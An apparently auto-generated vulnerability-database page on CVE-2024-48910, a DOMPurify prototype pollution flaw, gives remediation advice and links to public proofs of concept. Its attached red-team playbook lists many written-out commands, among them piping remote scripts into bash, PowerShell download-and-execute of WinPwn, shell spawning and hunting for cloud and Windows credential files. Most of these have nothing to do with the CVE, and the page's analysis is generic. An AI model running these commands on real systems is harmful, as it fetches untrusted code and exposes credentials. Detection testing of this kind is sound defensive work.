CVE-2024-48910
Overview
The vulnerability is a prototype pollution flaw within DOMPurify, a client-side DOM sanitizer for HTML, MathML, and SVG content. The root cause lies in improper handling of object prototypes, allowing an attacker to manipulate the prototype chain of JavaScript objects. This affects the core sanitization component responsible for cleaning potentially malicious input before DOM insertion.
Vulnerability Description
DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify was vulnerable to prototype pollution. This vulnerability is fixed in 2.4.2.
Impact
An unauthenticated remote attacker can exploit this vulnerability to manipulate the prototype chain, potentially altering application logic or bypassing security controls enforced by DOMPurify. Since the attack vector requires no user interaction and no privileges (CVSS vector AV:N/AC:L/PR:N/UI:N), it can be executed remotely. This may lead to persistent cross-site scripting or other client-side code manipulation, impacting data integrity and application behavior.
Solution
Users of DOMPurify should upgrade to version 2.4.2 or later, where the prototype pollution vulnerability is addressed. Detailed remediation steps and patch information are available in the official GitHub security advisory GHSA-p3vf-v8qc-cwcr and the associated commit d1dd0374caef2b4c56c3bd09fe1988c3479166dc. No additional workarounds are recommended beyond applying the updated version.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the DOMPurify library stems from a critical flaw related to prototype pollution, which allows an attacker to manipulate the prototype of an object. This occurs when untrusted input is processed without adequate validation, enabling an adversary to inject properties into the prototype chain of JavaScript objects. Consequently, this can lead to unexpected behavior in applications that rely on the library for sanitizing user-generated content. The flaw is particularly concerning because it undermines the very purpose of DOMPurify, which is designed to prevent cross-site scripting (XSS) attacks by sanitizing HTML, MathML, and SVG content. By exploiting this vulnerability, an attacker can potentially execute arbitrary code in the context of the web application, leading to severe security breaches.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the injection of malicious payloads into web applications that utilize the affected version of DOMPurify. For instance, an attacker might craft a malicious input that, when processed by the library, modifies the prototype of a critical object, such as the global `window` object. This could allow the attacker to manipulate application behavior, steal sensitive information, or escalate privileges within the application. Scenarios could include injecting scripts that capture user credentials, redirecting users to malicious sites, or even performing actions on behalf of the user without their consent. The ease of exploitation, combined with the widespread use of DOMPurify in web applications, amplifies the risk posed by this vulnerability.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on web applications to handle sensitive user data. Organizations that fail to address this flaw may face severe consequences, including data breaches, loss of customer trust, and potential legal ramifications. The high CVSS score of 9.8 indicates that this vulnerability poses a critical risk, making it imperative for organizations to prioritize its remediation. Furthermore, the reputational damage associated with a successful exploit can lead to long-term financial implications, as customers may choose to disengage from services perceived as insecure. In an era where data privacy and security are paramount, the ramifications of neglecting such vulnerabilities can be devastating.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, updating to the latest version of DOMPurify, specifically version 2.4.2 or later, is essential to eliminate the vulnerability. Regularly reviewing and updating third-party libraries is a best practice that can help organizations stay ahead of potential threats. Additionally, implementing security measures such as input validation, output encoding, and employing Content Security Policy (CSP) can further reduce the attack surface. Security teams should also conduct thorough code reviews and penetration testing to identify any potential weaknesses in their applications that could be exploited through this vulnerability.
In conclusion, the prototype pollution vulnerability in DOMPurify represents a critical threat to web applications that utilize this library for sanitization. The potential for exploitation through various attack vectors poses significant risks to organizations, including data breaches and reputational damage. By prioritizing timely updates, implementing robust security measures, and fostering a culture of security awareness, organizations can effectively mitigate the risks associated with this vulnerability and protect their users from potential harm. The evolving landscape of cybersecurity necessitates vigilance and proactive measures to safeguard against emerging threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cure53 | Dompurify | All |
cpe:2.3:a:cure53:dompurify:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Mitchellzhou1/CVE-2024-48910-PoC
|
Mitchellzhou1 | 2 | 0 | 2025-11-11 | View |
|
Alex-Acero-Security/CVE-2024-48910-POC
|
Alex-Acero-Security | 0 | 0 | 2025-11-12 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-48910 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html |